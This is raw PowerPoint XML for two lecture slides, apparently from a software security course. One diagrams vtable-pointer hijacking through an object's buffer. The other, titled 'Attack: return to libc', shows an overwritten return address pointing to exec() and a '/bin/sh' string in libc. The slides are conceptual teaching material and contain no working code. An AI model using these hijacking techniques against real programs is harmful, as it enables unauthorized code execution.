              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Arrow Connector 18"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="3"/>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6269092" y="1802882"/>
            <a:ext cx="990600"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59692" y="1618216"/>
            <a:ext cx="1439818" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6269092" y="2213378"/>
            <a:ext cx="990600"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59692" y="2028712"/>
            <a:ext cx="1439818" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method #2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Arrow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="24" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6269092" y="2514788"/>
            <a:ext cx="990600" cy="1262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59692" y="2456416"/>
            <a:ext cx="1439818" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>method #3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Rectangle 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="4154975"/>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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[256]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Rectangle 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610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8991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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9372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61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8153400" y="5081043"/>
            <a:ext cx="1676400" cy="445532"/>
            <a:chOff x="2971800" y="6324600"/>
            <a:chExt cx="1676400" cy="445532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Left Brace 7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3" name="TextBox 72"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3276600" y="6400800"/>
              <a:ext cx="907621" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>object</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="74" name="Straight Connector 73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4154975"/>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981200" y="4991587"/>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572000" y="4154975"/>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vtable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="Straight Connector 76"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4533900" y="4574075"/>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837905" y="457328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229600" y="4166643"/>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6629400" y="4078775"/>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4572000" y="4154975"/>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82"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4723606" y="4993969"/>
            <a:ext cx="3659188" cy="381794"/>
            <a:chOff x="3199606" y="6249194"/>
            <a:chExt cx="3659188" cy="381794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="84" name="Straight Arrow Connector 83"/>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Slide Number Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B83C71B-6D26-1D4A-BFDA-1E9B1FD0F7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>123</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70204D50-FE1F-3849-A1DA-B3E16BDBBA0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10287000" y="5415218"/>
            <a:ext cx="1726755" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Illustration from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>John Mitchell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10720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3206" y="66817"/>
            <a:ext cx="11712669" cy="944563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack: return to libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118937" y="1295400"/>
            <a:ext cx="9781674" cy="4888832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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 Control hijacking without supplying code to execute</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a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2514600"/>
            <a:ext cx="1295400" cy="762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args</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="Rectangle 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3276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ret-addr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20486" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3657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sfp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20487" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4038600"/>
            <a:ext cx="1295400" cy="457200"/>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20488" name="Rectangle 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4495800"/>
            <a:ext cx="1295400" cy="838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local buf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20489" name="Line 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2286000"/>
            <a:ext cx="0" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20490" name="Line 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2286000"/>
            <a:ext cx="0" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20491" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581401" y="1905000"/>
            <a:ext cx="782587" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20492" name="Rectangle 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="2514600"/>
            <a:ext cx="1295400" cy="762000"/>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sz="2400" dirty="0">
              <a:latin typeface="Times" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20493" name="Rectangle 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3276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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exec()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20494" name="Rectangle 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="3657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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>printf()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20495" name="Rectangle 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="4038600"/>
            <a:ext cx="1295400" cy="457200"/>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20496" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="4495800"/>
            <a:ext cx="1295400" cy="838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a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“/bin/sh”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20497" name="Line 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="2286000"/>
            <a:ext cx="0" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20498" name="Line 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="2286000"/>
            <a:ext cx="0" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20499" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467601" y="1905000"/>
            <a:ext cx="912429" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>libc.so</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72753" name="Line 49"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3505200"/>
            <a:ext cx="2743200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72754" name="Line 50"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3048000"/>
            <a:ext cx="2743200" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72755" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2667000"/>
            <a:ext cx="1295400" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6600">
              <a:alpha val="45097"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20503" name="Line 52"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3352800" y="3276600"/>
            <a:ext cx="1295400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20504" name="Line 53"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="1295400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20505" name="Line 54"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3352800" y="4038600"/>
            <a:ext cx="1295400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20506" name="Line 55"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3352800" y="4495800"/>
            <a:ext cx="1295400" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46F23F69-A5E7-3E4C-A14A-FA4CF8FB046B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289440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53" grpId="0" animBg="1"/>
      <p:bldP spid="72754" grpId="0" animBg="1"/>
      <p:bldP spid="7275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4" y="80863"/>
            <a:ext cx="11277600" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
